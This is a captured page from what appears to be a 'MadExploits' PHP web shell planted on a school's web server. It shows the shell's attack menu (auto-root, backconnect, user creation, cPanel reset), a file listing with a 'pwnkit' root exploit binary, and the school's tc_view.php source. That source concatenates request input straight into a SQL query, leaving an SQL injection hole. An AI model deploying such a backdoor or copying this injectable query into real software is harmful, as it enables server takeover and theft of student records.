Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.116.20.205
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
nbspublicschool /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
nbs_website
[ DIR ]
drwxr-xr-x
.htaccess
370
B
-r-----r--
.mad-root
0
B
-rw-r--r--
contact.php
5.55
KB
-rw-r--r--
css.php
146
B
-rw-r--r--
disclosure.php
1.75
KB
-rw-r--r--
event.php
1.95
KB
-rw-r--r--
facility.php
3.72
KB
-rw-r--r--
faculty.php
2.17
KB
-rw-r--r--
homework.php
7.88
KB
-rw-r--r--
index.php
35.98
KB
-rw-r--r--
index2.php
14.7
KB
-rw-r--r--
msg.php
3.18
KB
-rw-r--r--
news.php
1.94
KB
-rw-r--r--
profile.php
5.65
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
syllabus.php
2.46
KB
-rw-r--r--
tc.php
3.74
KB
-rw-r--r--
tc_view.php
2.24
KB
-rw-r--r--
topper_result.php
1.73
KB
-rw-r--r--
video.php
1.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tc_view.php
<?php include('include/header.php'); ?> <!--- breadcrumb ---> <div class="category_ flw"> <div class="container"> <div class="left_"> <h1>TC View <span></span></h1> </div> <div class="right_"> <ul class="cat_navigation"> <li><a href="index">Home</a></li> <li><span class="ion-android-arrow-dropright-circle"></span></li> <li><a href="#">TC View</a></li> </ul> </div> </div> </div> <!---// breadcrumb ---> <!--- side buttton ---> <div class="mybutton"> <a href="contact"><img src="images/cont.jpg" class="img-fluid" /></a> </div> <!---// side buttton ---> <main id="main" class="page_content page_blog"> <div class="container"> <div class="row"> <?php if(!empty($_REQUEST['class']) && !empty($_REQUEST['tc_srno']) ): $sql= "SELECT * FROM `tc` WHERE `class`= '$_REQUEST[class]'"; $rs= mysqli_query($obj->mysqli,$sql); $num= mysqli_num_rows($rs); if($num==1): $fet=mysqli_fetch_assoc($rs); ?> <div class="col-md-6 col-lg-6"> <div class="post_"> <div class="name_"> <a href="#" class="btn_name">Student Name:- <?= $fet['name']?></a> </div> <ul class="list_if"> <li>TC S.R. NO. <a href="#"><?= $fet['tc_srno']?></a></li> </ul> <div class="das"></div> <div class="sum_"> <a href="nbs_website/_saving/tc/<?= $fet['tc_img'] ?>" class="btn_rm" target="_blank">Download TC</a> <img src="nbs_website/_saving/tc/<?= $fet['tc_img'] ?>" class="img-fluid mt30" alt=""> </div> </div> </div> <?php endif; endif; ?> </div> </main> <!---// main ---> <?php include('include/footer.php'); ?>
Close